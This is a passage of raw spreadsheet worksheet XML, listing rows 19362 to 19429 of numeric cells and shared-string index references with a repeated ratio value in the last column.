        <v>15755</v>
      </c>
      <c r="F19362" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19363" ht="15.75" customHeight="1">
      <c r="A19363" s="1">
        <v>10884.0</v>
      </c>
      <c r="B19363" s="2">
        <v>1.6526848E7</v>
      </c>
      <c r="C19363" s="2" t="s">
        <v>18661</v>
      </c>
      <c r="D19363" s="2">
        <v>1.0</v>
      </c>
      <c r="E19363" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19363" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19364" ht="15.75" customHeight="1">
      <c r="A19364" s="1">
        <v>11057.0</v>
      </c>
      <c r="B19364" s="2">
        <v>1.8184612E7</v>
      </c>
      <c r="C19364" s="2" t="s">
        <v>18662</v>
      </c>
      <c r="D19364" s="2">
        <v>1.0</v>
      </c>
      <c r="E19364" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19364" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19365" ht="15.75" customHeight="1">
      <c r="A19365" s="1">
        <v>11074.0</v>
      </c>
      <c r="B19365" s="2">
        <v>1.8409435E7</v>
      </c>
      <c r="C19365" s="2" t="s">
        <v>18663</v>
      </c>
      <c r="D19365" s="2">
        <v>1.0</v>
      </c>
      <c r="E19365" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19365" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19366" ht="15.75" customHeight="1">
      <c r="A19366" s="1">
        <v>11484.0</v>
      </c>
      <c r="B19366" s="2">
        <v>2.2030222E7</v>
      </c>
      <c r="C19366" s="2" t="s">
        <v>18664</v>
      </c>
      <c r="D19366" s="2">
        <v>1.0</v>
      </c>
      <c r="E19366" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19366" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19367" ht="15.75" customHeight="1">
      <c r="A19367" s="1">
        <v>11515.0</v>
      </c>
      <c r="B19367" s="2">
        <v>2.230958E7</v>
      </c>
      <c r="C19367" s="2" t="s">
        <v>18665</v>
      </c>
      <c r="D19367" s="2">
        <v>1.0</v>
      </c>
      <c r="E19367" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19367" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19368" ht="15.75" customHeight="1">
      <c r="A19368" s="1">
        <v>11549.0</v>
      </c>
      <c r="B19368" s="2">
        <v>2.2678017E7</v>
      </c>
      <c r="C19368" s="2" t="s">
        <v>18666</v>
      </c>
      <c r="D19368" s="2">
        <v>1.0</v>
      </c>
      <c r="E19368" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19368" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19369" ht="15.75" customHeight="1">
      <c r="A19369" s="1">
        <v>11675.0</v>
      </c>
      <c r="B19369" s="2">
        <v>2.3415445E7</v>
      </c>
      <c r="C19369" s="2" t="s">
        <v>18667</v>
      </c>
      <c r="D19369" s="2">
        <v>1.0</v>
      </c>
      <c r="E19369" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19369" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19370" ht="15.75" customHeight="1">
      <c r="A19370" s="1">
        <v>11902.0</v>
      </c>
      <c r="B19370" s="2">
        <v>2.5191666E7</v>
      </c>
      <c r="C19370" s="2" t="s">
        <v>18668</v>
      </c>
      <c r="D19370" s="2">
        <v>1.0</v>
      </c>
      <c r="E19370" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19370" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19371" ht="15.75" customHeight="1">
      <c r="A19371" s="1">
        <v>12168.0</v>
      </c>
      <c r="B19371" s="2">
        <v>2.7390322E7</v>
      </c>
      <c r="C19371" s="2" t="s">
        <v>18669</v>
      </c>
      <c r="D19371" s="2">
        <v>1.0</v>
      </c>
      <c r="E19371" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19371" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19372" ht="15.75" customHeight="1">
      <c r="A19372" s="1">
        <v>12215.0</v>
      </c>
      <c r="B19372" s="2">
        <v>2.7684751E7</v>
      </c>
      <c r="C19372" s="2" t="s">
        <v>18670</v>
      </c>
      <c r="D19372" s="2">
        <v>1.0</v>
      </c>
      <c r="E19372" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19372" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19373" ht="15.75" customHeight="1">
      <c r="A19373" s="1">
        <v>12392.0</v>
      </c>
      <c r="B19373" s="2">
        <v>2.8904925E7</v>
      </c>
      <c r="C19373" s="2" t="s">
        <v>18671</v>
      </c>
      <c r="D19373" s="2">
        <v>1.0</v>
      </c>
      <c r="E19373" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19373" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19374" ht="15.75" customHeight="1">
      <c r="A19374" s="1">
        <v>12434.0</v>
      </c>
      <c r="B19374" s="2">
        <v>2.9233025E7</v>
      </c>
      <c r="C19374" s="2" t="s">
        <v>18672</v>
      </c>
      <c r="D19374" s="2">
        <v>1.0</v>
      </c>
      <c r="E19374" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19374" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19375" ht="15.75" customHeight="1">
      <c r="A19375" s="1">
        <v>12555.0</v>
      </c>
      <c r="B19375" s="2">
        <v>2.9882524E7</v>
      </c>
      <c r="C19375" s="2" t="s">
        <v>18673</v>
      </c>
      <c r="D19375" s="2">
        <v>1.0</v>
      </c>
      <c r="E19375" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19375" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19376" ht="15.75" customHeight="1">
      <c r="A19376" s="1">
        <v>12675.0</v>
      </c>
      <c r="B19376" s="2">
        <v>3.0605977E7</v>
      </c>
      <c r="C19376" s="2" t="s">
        <v>18674</v>
      </c>
      <c r="D19376" s="2">
        <v>1.0</v>
      </c>
      <c r="E19376" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19376" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19377" ht="15.75" customHeight="1">
      <c r="A19377" s="1">
        <v>12701.0</v>
      </c>
      <c r="B19377" s="2">
        <v>3.0811531E7</v>
      </c>
      <c r="C19377" s="2" t="s">
        <v>18675</v>
      </c>
      <c r="D19377" s="2">
        <v>1.0</v>
      </c>
      <c r="E19377" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19377" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19378" ht="15.75" customHeight="1">
      <c r="A19378" s="1">
        <v>12851.0</v>
      </c>
      <c r="B19378" s="2">
        <v>3.1798764E7</v>
      </c>
      <c r="C19378" s="2" t="s">
        <v>18676</v>
      </c>
      <c r="D19378" s="2">
        <v>1.0</v>
      </c>
      <c r="E19378" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19378" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19379" ht="15.75" customHeight="1">
      <c r="A19379" s="1">
        <v>13008.0</v>
      </c>
      <c r="B19379" s="2">
        <v>3.2835394E7</v>
      </c>
      <c r="C19379" s="2" t="s">
        <v>18677</v>
      </c>
      <c r="D19379" s="2">
        <v>1.0</v>
      </c>
      <c r="E19379" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19379" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19380" ht="15.75" customHeight="1">
      <c r="A19380" s="1">
        <v>13914.0</v>
      </c>
      <c r="B19380" s="2">
        <v>3.7099265E7</v>
      </c>
      <c r="C19380" s="2" t="s">
        <v>18678</v>
      </c>
      <c r="D19380" s="2">
        <v>1.0</v>
      </c>
      <c r="E19380" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19380" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19381" ht="15.75" customHeight="1">
      <c r="A19381" s="1">
        <v>14407.0</v>
      </c>
      <c r="B19381" s="2">
        <v>3.9191699E7</v>
      </c>
      <c r="C19381" s="2" t="s">
        <v>18679</v>
      </c>
      <c r="D19381" s="2">
        <v>1.0</v>
      </c>
      <c r="E19381" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19381" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19382" ht="15.75" customHeight="1">
      <c r="A19382" s="1">
        <v>14525.0</v>
      </c>
      <c r="B19382" s="2">
        <v>3.9782655E7</v>
      </c>
      <c r="C19382" s="2" t="s">
        <v>18680</v>
      </c>
      <c r="D19382" s="2">
        <v>1.0</v>
      </c>
      <c r="E19382" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19382" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19383" ht="15.75" customHeight="1">
      <c r="A19383" s="1">
        <v>14526.0</v>
      </c>
      <c r="B19383" s="2">
        <v>3.9801038E7</v>
      </c>
      <c r="C19383" s="2" t="s">
        <v>18681</v>
      </c>
      <c r="D19383" s="2">
        <v>1.0</v>
      </c>
      <c r="E19383" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19383" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19384" ht="15.75" customHeight="1">
      <c r="A19384" s="1">
        <v>15020.0</v>
      </c>
      <c r="B19384" s="2">
        <v>4.154174E7</v>
      </c>
      <c r="C19384" s="2" t="s">
        <v>18682</v>
      </c>
      <c r="D19384" s="2">
        <v>1.0</v>
      </c>
      <c r="E19384" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19384" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19385" ht="15.75" customHeight="1">
      <c r="A19385" s="1">
        <v>15069.0</v>
      </c>
      <c r="B19385" s="2">
        <v>4.1719746E7</v>
      </c>
      <c r="C19385" s="2" t="s">
        <v>18683</v>
      </c>
      <c r="D19385" s="2">
        <v>1.0</v>
      </c>
      <c r="E19385" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19385" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19386" ht="15.75" customHeight="1">
      <c r="A19386" s="1">
        <v>15310.0</v>
      </c>
      <c r="B19386" s="2">
        <v>4.2499314E7</v>
      </c>
      <c r="C19386" s="2" t="s">
        <v>18684</v>
      </c>
      <c r="D19386" s="2">
        <v>1.0</v>
      </c>
      <c r="E19386" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19386" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19387" ht="15.75" customHeight="1">
      <c r="A19387" s="1">
        <v>15756.0</v>
      </c>
      <c r="B19387" s="2">
        <v>4.4145193E7</v>
      </c>
      <c r="C19387" s="2" t="s">
        <v>18685</v>
      </c>
      <c r="D19387" s="2">
        <v>1.0</v>
      </c>
      <c r="E19387" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19387" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19388" ht="15.75" customHeight="1">
      <c r="A19388" s="1">
        <v>16387.0</v>
      </c>
      <c r="B19388" s="2">
        <v>4.6235242E7</v>
      </c>
      <c r="C19388" s="2" t="s">
        <v>18686</v>
      </c>
      <c r="D19388" s="2">
        <v>1.0</v>
      </c>
      <c r="E19388" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19388" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19389" ht="15.75" customHeight="1">
      <c r="A19389" s="1">
        <v>16594.0</v>
      </c>
      <c r="B19389" s="2">
        <v>4.7002628E7</v>
      </c>
      <c r="C19389" s="2" t="s">
        <v>18687</v>
      </c>
      <c r="D19389" s="2">
        <v>1.0</v>
      </c>
      <c r="E19389" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19389" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19390" ht="15.75" customHeight="1">
      <c r="A19390" s="1">
        <v>16822.0</v>
      </c>
      <c r="B19390" s="2">
        <v>4.7857937E7</v>
      </c>
      <c r="C19390" s="2" t="s">
        <v>18688</v>
      </c>
      <c r="D19390" s="2">
        <v>1.0</v>
      </c>
      <c r="E19390" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19390" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19391" ht="15.75" customHeight="1">
      <c r="A19391" s="1">
        <v>16878.0</v>
      </c>
      <c r="B19391" s="2">
        <v>4.7972462E7</v>
      </c>
      <c r="C19391" s="2" t="s">
        <v>18689</v>
      </c>
      <c r="D19391" s="2">
        <v>1.0</v>
      </c>
      <c r="E19391" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19391" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19392" ht="15.75" customHeight="1">
      <c r="A19392" s="1">
        <v>16926.0</v>
      </c>
      <c r="B19392" s="2">
        <v>4.8149363E7</v>
      </c>
      <c r="C19392" s="2" t="s">
        <v>18690</v>
      </c>
      <c r="D19392" s="2">
        <v>1.0</v>
      </c>
      <c r="E19392" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19392" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19393" ht="15.75" customHeight="1">
      <c r="A19393" s="1">
        <v>16935.0</v>
      </c>
      <c r="B19393" s="2">
        <v>4.8176505E7</v>
      </c>
      <c r="C19393" s="2" t="s">
        <v>18691</v>
      </c>
      <c r="D19393" s="2">
        <v>1.0</v>
      </c>
      <c r="E19393" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19393" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19394" ht="15.75" customHeight="1">
      <c r="A19394" s="1">
        <v>17102.0</v>
      </c>
      <c r="B19394" s="2">
        <v>4.8682857E7</v>
      </c>
      <c r="C19394" s="2" t="s">
        <v>18692</v>
      </c>
      <c r="D19394" s="2">
        <v>1.0</v>
      </c>
      <c r="E19394" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19394" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19395" ht="15.75" customHeight="1">
      <c r="A19395" s="1">
        <v>17949.0</v>
      </c>
      <c r="B19395" s="2">
        <v>5.1254273E7</v>
      </c>
      <c r="C19395" s="2" t="s">
        <v>18693</v>
      </c>
      <c r="D19395" s="2">
        <v>1.0</v>
      </c>
      <c r="E19395" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19395" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19396" ht="15.75" customHeight="1">
      <c r="A19396" s="1">
        <v>18915.0</v>
      </c>
      <c r="B19396" s="2">
        <v>5.4205555E7</v>
      </c>
      <c r="C19396" s="2" t="s">
        <v>18694</v>
      </c>
      <c r="D19396" s="2">
        <v>1.0</v>
      </c>
      <c r="E19396" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19396" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19397" ht="15.75" customHeight="1">
      <c r="A19397" s="1">
        <v>19319.0</v>
      </c>
      <c r="B19397" s="2">
        <v>5.529242E7</v>
      </c>
      <c r="C19397" s="2" t="s">
        <v>18695</v>
      </c>
      <c r="D19397" s="2">
        <v>1.0</v>
      </c>
      <c r="E19397" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19397" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19398" ht="15.75" customHeight="1">
      <c r="A19398" s="1">
        <v>19395.0</v>
      </c>
      <c r="B19398" s="2">
        <v>5.5570341E7</v>
      </c>
      <c r="C19398" s="2" t="s">
        <v>18696</v>
      </c>
      <c r="D19398" s="2">
        <v>1.0</v>
      </c>
      <c r="E19398" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19398" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19399" ht="15.75" customHeight="1">
      <c r="A19399" s="1">
        <v>19566.0</v>
      </c>
      <c r="B19399" s="2">
        <v>5.6117309E7</v>
      </c>
      <c r="C19399" s="2" t="s">
        <v>18697</v>
      </c>
      <c r="D19399" s="2">
        <v>1.0</v>
      </c>
      <c r="E19399" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19399" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19400" ht="15.75" customHeight="1">
      <c r="A19400" s="1">
        <v>19964.0</v>
      </c>
      <c r="B19400" s="2">
        <v>5.7551567E7</v>
      </c>
      <c r="C19400" s="2" t="s">
        <v>18698</v>
      </c>
      <c r="D19400" s="2">
        <v>1.0</v>
      </c>
      <c r="E19400" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19400" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19401" ht="15.75" customHeight="1">
      <c r="A19401" s="1">
        <v>20041.0</v>
      </c>
      <c r="B19401" s="2">
        <v>7562641.0</v>
      </c>
      <c r="C19401" s="2" t="s">
        <v>18699</v>
      </c>
      <c r="D19401" s="2">
        <v>1.0</v>
      </c>
      <c r="E19401" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19401" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19402" ht="15.75" customHeight="1">
      <c r="A19402" s="1">
        <v>20299.0</v>
      </c>
      <c r="B19402" s="2">
        <v>1.1302023E7</v>
      </c>
      <c r="C19402" s="2" t="s">
        <v>18700</v>
      </c>
      <c r="D19402" s="2">
        <v>1.0</v>
      </c>
      <c r="E19402" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19402" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19403" ht="15.75" customHeight="1">
      <c r="A19403" s="1">
        <v>20423.0</v>
      </c>
      <c r="B19403" s="2">
        <v>1.2310026E7</v>
      </c>
      <c r="C19403" s="2" t="s">
        <v>18701</v>
      </c>
      <c r="D19403" s="2">
        <v>1.0</v>
      </c>
      <c r="E19403" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19403" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19404" ht="15.75" customHeight="1">
      <c r="A19404" s="1">
        <v>20473.0</v>
      </c>
      <c r="B19404" s="2">
        <v>1.2805187E7</v>
      </c>
      <c r="C19404" s="2" t="s">
        <v>18702</v>
      </c>
      <c r="D19404" s="2">
        <v>1.0</v>
      </c>
      <c r="E19404" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19404" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19405" ht="15.75" customHeight="1">
      <c r="A19405" s="1">
        <v>20731.0</v>
      </c>
      <c r="B19405" s="2">
        <v>1.4702194E7</v>
      </c>
      <c r="C19405" s="2" t="s">
        <v>18703</v>
      </c>
      <c r="D19405" s="2">
        <v>1.0</v>
      </c>
      <c r="E19405" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19405" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19406" ht="15.75" customHeight="1">
      <c r="A19406" s="1">
        <v>20761.0</v>
      </c>
      <c r="B19406" s="2">
        <v>1.492104E7</v>
      </c>
      <c r="C19406" s="2" t="s">
        <v>18704</v>
      </c>
      <c r="D19406" s="2">
        <v>1.0</v>
      </c>
      <c r="E19406" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19406" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19407" ht="15.75" customHeight="1">
      <c r="A19407" s="1">
        <v>20922.0</v>
      </c>
      <c r="B19407" s="2">
        <v>1.6393808E7</v>
      </c>
      <c r="C19407" s="2" t="s">
        <v>18705</v>
      </c>
      <c r="D19407" s="2">
        <v>1.0</v>
      </c>
      <c r="E19407" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19407" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19408" ht="15.75" customHeight="1">
      <c r="A19408" s="1">
        <v>21509.0</v>
      </c>
      <c r="B19408" s="2">
        <v>2.3150889E7</v>
      </c>
      <c r="C19408" s="2" t="s">
        <v>18706</v>
      </c>
      <c r="D19408" s="2">
        <v>1.0</v>
      </c>
      <c r="E19408" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19408" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19409" ht="15.75" customHeight="1">
      <c r="A19409" s="1">
        <v>21861.0</v>
      </c>
      <c r="B19409" s="2">
        <v>2.7336699E7</v>
      </c>
      <c r="C19409" s="2" t="s">
        <v>18707</v>
      </c>
      <c r="D19409" s="2">
        <v>1.0</v>
      </c>
      <c r="E19409" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19409" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19410" ht="15.75" customHeight="1">
      <c r="A19410" s="1">
        <v>22519.0</v>
      </c>
      <c r="B19410" s="2">
        <v>3.763422E7</v>
      </c>
      <c r="C19410" s="2" t="s">
        <v>18708</v>
      </c>
      <c r="D19410" s="2">
        <v>1.0</v>
      </c>
      <c r="E19410" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19410" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19411" ht="15.75" customHeight="1">
      <c r="A19411" s="1">
        <v>22670.0</v>
      </c>
      <c r="B19411" s="2">
        <v>4.1539102E7</v>
      </c>
      <c r="C19411" s="2" t="s">
        <v>18709</v>
      </c>
      <c r="D19411" s="2">
        <v>1.0</v>
      </c>
      <c r="E19411" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19411" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19412" ht="15.75" customHeight="1">
      <c r="A19412" s="1">
        <v>23134.0</v>
      </c>
      <c r="B19412" s="2">
        <v>5.1479871E7</v>
      </c>
      <c r="C19412" s="2" t="s">
        <v>18710</v>
      </c>
      <c r="D19412" s="2">
        <v>1.0</v>
      </c>
      <c r="E19412" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19412" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19413" ht="15.75" customHeight="1">
      <c r="A19413" s="1">
        <v>23653.0</v>
      </c>
      <c r="B19413" s="2">
        <v>6795881.0</v>
      </c>
      <c r="C19413" s="2" t="s">
        <v>18711</v>
      </c>
      <c r="D19413" s="2">
        <v>1.0</v>
      </c>
      <c r="E19413" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19413" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19414" ht="15.75" customHeight="1">
      <c r="A19414" s="1">
        <v>24043.0</v>
      </c>
      <c r="B19414" s="2">
        <v>9514485.0</v>
      </c>
      <c r="C19414" s="2" t="s">
        <v>18712</v>
      </c>
      <c r="D19414" s="2">
        <v>1.0</v>
      </c>
      <c r="E19414" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19414" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19415" ht="15.75" customHeight="1">
      <c r="A19415" s="1">
        <v>24127.0</v>
      </c>
      <c r="B19415" s="2">
        <v>1.0018539E7</v>
      </c>
      <c r="C19415" s="2" t="s">
        <v>18713</v>
      </c>
      <c r="D19415" s="2">
        <v>1.0</v>
      </c>
      <c r="E19415" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19415" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19416" ht="15.75" customHeight="1">
      <c r="A19416" s="1">
        <v>24138.0</v>
      </c>
      <c r="B19416" s="2">
        <v>1.004768E7</v>
      </c>
      <c r="C19416" s="2" t="s">
        <v>18714</v>
      </c>
      <c r="D19416" s="2">
        <v>1.0</v>
      </c>
      <c r="E19416" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19416" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19417" ht="15.75" customHeight="1">
      <c r="A19417" s="1">
        <v>24214.0</v>
      </c>
      <c r="B19417" s="2">
        <v>1.0401651E7</v>
      </c>
      <c r="C19417" s="2" t="s">
        <v>18715</v>
      </c>
      <c r="D19417" s="2">
        <v>1.0</v>
      </c>
      <c r="E19417" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19417" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19418" ht="15.75" customHeight="1">
      <c r="A19418" s="1">
        <v>24590.0</v>
      </c>
      <c r="B19418" s="2">
        <v>1.1352622E7</v>
      </c>
      <c r="C19418" s="2" t="s">
        <v>18716</v>
      </c>
      <c r="D19418" s="2">
        <v>1.0</v>
      </c>
      <c r="E19418" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19418" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19419" ht="15.75" customHeight="1">
      <c r="A19419" s="1">
        <v>24925.0</v>
      </c>
      <c r="B19419" s="2">
        <v>1.2413383E7</v>
      </c>
      <c r="C19419" s="2" t="s">
        <v>18717</v>
      </c>
      <c r="D19419" s="2">
        <v>1.0</v>
      </c>
      <c r="E19419" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19419" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19420" ht="15.75" customHeight="1">
      <c r="A19420" s="1">
        <v>25155.0</v>
      </c>
      <c r="B19420" s="2">
        <v>1.3065634E7</v>
      </c>
      <c r="C19420" s="2" t="s">
        <v>18718</v>
      </c>
      <c r="D19420" s="2">
        <v>1.0</v>
      </c>
      <c r="E19420" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19420" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19421" ht="15.75" customHeight="1">
      <c r="A19421" s="1">
        <v>25616.0</v>
      </c>
      <c r="B19421" s="2">
        <v>1.4402219E7</v>
      </c>
      <c r="C19421" s="2" t="s">
        <v>18719</v>
      </c>
      <c r="D19421" s="2">
        <v>1.0</v>
      </c>
      <c r="E19421" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19421" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19422" ht="15.75" customHeight="1">
      <c r="A19422" s="1">
        <v>26256.0</v>
      </c>
      <c r="B19422" s="2">
        <v>1.6340463E7</v>
      </c>
      <c r="C19422" s="2" t="s">
        <v>18720</v>
      </c>
      <c r="D19422" s="2">
        <v>1.0</v>
      </c>
      <c r="E19422" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19422" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19423" ht="15.75" customHeight="1">
      <c r="A19423" s="1">
        <v>26410.0</v>
      </c>
      <c r="B19423" s="2">
        <v>1.7088168E7</v>
      </c>
      <c r="C19423" s="2" t="s">
        <v>18721</v>
      </c>
      <c r="D19423" s="2">
        <v>1.0</v>
      </c>
      <c r="E19423" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19423" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19424" ht="15.75" customHeight="1">
      <c r="A19424" s="1">
        <v>26589.0</v>
      </c>
      <c r="B19424" s="2">
        <v>1.7943838E7</v>
      </c>
      <c r="C19424" s="2" t="s">
        <v>13303</v>
      </c>
      <c r="D19424" s="2">
        <v>1.0</v>
      </c>
      <c r="E19424" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19424" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19425" ht="15.75" customHeight="1">
      <c r="A19425" s="1">
        <v>27329.0</v>
      </c>
      <c r="B19425" s="2">
        <v>2.1421674E7</v>
      </c>
      <c r="C19425" s="2" t="s">
        <v>18722</v>
      </c>
      <c r="D19425" s="2">
        <v>1.0</v>
      </c>
      <c r="E19425" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19425" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19426" ht="15.75" customHeight="1">
      <c r="A19426" s="1">
        <v>27714.0</v>
      </c>
      <c r="B19426" s="2">
        <v>2.3059211E7</v>
      </c>
      <c r="C19426" s="2" t="s">
        <v>18723</v>
      </c>
      <c r="D19426" s="2">
        <v>1.0</v>
      </c>
      <c r="E19426" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19426" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19427" ht="15.75" customHeight="1">
      <c r="A19427" s="1">
        <v>27795.0</v>
      </c>
      <c r="B19427" s="2">
        <v>2.3150888E7</v>
      </c>
      <c r="C19427" s="2" t="s">
        <v>18706</v>
      </c>
      <c r="D19427" s="2">
        <v>1.0</v>
      </c>
      <c r="E19427" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19427" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19428" ht="15.75" customHeight="1">
      <c r="A19428" s="1">
        <v>28032.0</v>
      </c>
      <c r="B19428" s="2">
        <v>2.445451E7</v>
      </c>
      <c r="C19428" s="2" t="s">
        <v>18724</v>
      </c>
      <c r="D19428" s="2">
        <v>1.0</v>
      </c>
      <c r="E19428" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19428" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="19429" ht="15.75" customHeight="1">
      <c r="A19429" s="1">
        <v>28078.0</v>
      </c>
      <c r="B19429" s="2">
        <v>2.4628951E7</v>
      </c>
      <c r="C19429" s="2" t="s">
        <v>18725</v>
      </c>
      <c r="D19429" s="2">
        <v>1.0</v>
      </c>
      <c r="E19429" s="3" t="s">
